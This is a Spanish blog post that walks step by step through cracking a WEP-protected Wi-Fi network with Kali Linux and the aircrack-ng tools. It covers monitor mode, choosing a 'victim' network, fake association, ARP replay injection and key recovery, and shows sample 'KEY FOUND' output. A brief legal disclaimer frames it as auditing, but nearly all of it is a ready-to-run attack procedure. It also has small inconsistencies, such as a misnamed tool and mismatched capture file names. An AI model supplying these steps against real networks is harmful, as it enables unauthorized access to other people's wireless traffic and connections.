Hackear redes WEP con Kali


#HackinWep #Hacking |Como todo y lo dijo muy bien el tío Ben «Un gran poder conlleva una gran responsabilidad» (Aun que esa frase la dijo el narrador del comic al final de la viñeta, pero bueno eso es otro tema)

Como siempre me cabe destacar, todo manual sobre este tipo de métodos no fueron desarrollados con fines de acceder a información personal u cualquier mal uso que se le pueda dar, las herramientas usadas en estos procedimientos fueron desarrolladas para auditar la seguridad redes WiFi. No me hago responsable del uso que se le pueda dar, pero solo recordaros que si hacéis esto en una red ajena estaríais incurriendo en un delito.


La familia linux y mas su comunidad han hechos grandes avances en todas las áreas del mundo, pero bueno para que explico esto mejor pasemos a lo bueno.

REQUISITOS:

  1. Kali Linux
  2. Tarjeta WiFi(Que soporte modo monitor| Recomiendo la antena Alfa 500mW)
  3. Tener en tu arsenal:
    • Aircrack-ng
    • Airmon-ng
    • Airdump-ng
    • Aireplay-ng
  4. Ganas de aprender pequeños padawan´s

A HACKEAR REDES WEP:

  • *Abrir la terminal ^ Ctrl+ Alt+T con tu teclado.
1 – En el *terminal lanzaremos el comando iwconfig para comprobar cuál es nuestra interfaz de red inalámbrica:
iwconfig

2 – En este paso pondremos nuestra Tarjeta Wifi en modo monitor.
airmon-ng start wlan1
Como vemos, la tarjeta se ha asignado a la interfaz mon0 en modo monitor.
3 – Lanzaremos airodump-ng mon0 (o el nombre de la tarjeta, mon0 no es O mayúscula es un Cero 0). Esto hará que se vaya saltando de canal en canal capturando todo el tráfico:
airodump-ng mon0
Ahora toca dejar unos cuantos minutos que capture bien y haga el listado de redes y detectaremos a nuestra víctima, lo más conveniente es elegir la que más cercana este está la detectamos en la Columna de PWR que entre más alto el número más cercas y por ultimo como este tutorial se basa en redes WEP nos fijaremos en el tipo de cifrado.
  • Para parar la herramienta una vez localizado el objetivo, únicamente debemos pulsar las teclas CTRL + C

4 –  Ahora nos centraremos en capturar únicamente el tráfico de la red a auditar, por lo cual volvemos a lanzar airodump-ng con los siguientes parámetros:
  • --bssid: Es la dirección MAC del AP de la red, que podemos ver en la columna 1 de la anterior captura.
  • -c: Canal en el cual vamos a estar escuchando. Lo encontráis en la columna CH.
  • -w: Escribimos todos los datos capturados en un fichero, que ahora llamaremos wlan_31, para poder descifrar la contraseña con aircrack.
  • mon0: La tarjeta desde la cual estamos capturando el tráfico. Recordad que tiene que estar en modo monitor.

5 – Tal y como se ve claramente en la imagen, estamos capturando únicamente el trafico de la red WLAN_31. En STATION vemos los clientes conectados a esta red, pero vemos que en campo #Data, necesario para poder romper el cifrado, no se está generando demasiado tráfico. Es por esto que vamos a realizar una asociación a esta red con el comando aireplay.
aireplay-ng -1 0 -a <MAC AP> mon0
Nos asociamos al AP utilizando el comando aireplay-ng -1 0 -a <MAC AP> (00:23:F8:AA:AA:AA)
Debemos asegurarnos que la salida de la aplicación nos indica “Association successful  :-)
Hecho esto, podemos afirmar que estamos asociados al AP y en este momento empezaremos una re-inyección de paquetes que generará una gran cantidad de datos en la red inalámbrica.


6 – Como comentábamos anteriormente, lanzamos mediante aireplay-ng un ataque de re-inyección de paquetes ARP que generarán el tráfico necesario para poder obtener una gran cantidad de paquetes rápidamente, como veremos en la segunda captura.

El ataque lo realizamos con el comando:
aireplay-ng -3 -b <MAC AP> mon0
Como se observa, la cantidad de #Data está aumentado ya que el parámetro #/s indica que hay un gran número de paquetes de datos por segundo.



7 – Lo ideal esperar a tener poco más de 50 000 paquetes para que tengamos mayor posibilidad de obtener la clave.Lo pongo como 50k por experiencia propia, dicen otros que hasta con 20k logras el mismo cometido.
Al tener 50.000 paquetes podemos lanzar el siguiente comando. El cual empezará a analizar el fichero CAP para obtener la clave.

8 – Ahora solo nos toca esperar que Aircrack descifre la clave y nos la muestre es cuestión de minutos hasta segundos.
Inicia otra consola y escribe:
aircrack-ng -z -b 00:23:F8:AA:AA:AA output*.cap
Donde:
  • -z utiliza el método “PTW WEP-cracking” que es muy rápido y necesita pocos IVs.
  • -b 00:23:F8:AA:AA:AA selecciona el punto de acceso en el que estamos interesados. Esto es opcional y ten en cuenta que al principio ya hemos aplicado un filtro para capturar solo datos de este AP.
  • output*.cap selecciona todos los archivos que comienzan con “output” y acaban por ”.cap“.

Si tenemos éxito aparecerá algo como esto:

                                              Aircrack-ng 0.9
 
                              [00:01:18] Tested 0/140000 keys (got 30680 IVs)
 
 KB    depth   byte(vote)
  0    0/  1   12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140) 
  1    0/  1   34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136) 
  2    0/  1   56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 31( 140) 
  3    0/  1   78( 158) 13( 156) 01( 152) 5F( 151) 28( 149) 59( 145) FC( 145) 7E( 143) 76( 142) 92( 142) 
  4    0/  1   90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 41( 141) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Decrypted correctly: 100%
NOTA:
Algunos puntos de acceso están configurados para permitir únicamente una dirección MAC para asociarse y conectarse. Si este es tu caso, no serás capaz de realizar la falsa autenticación de forma éxitosa, salvo que conozcas una de las direcciones MAC que están permitidas para poder conectarse a ese AP.

¡¡Usa con sabiduría este poder mi pequeño padawan y que la fuerza te acompañe!!

No hay comentarios.:

Con tecnología de Blogger.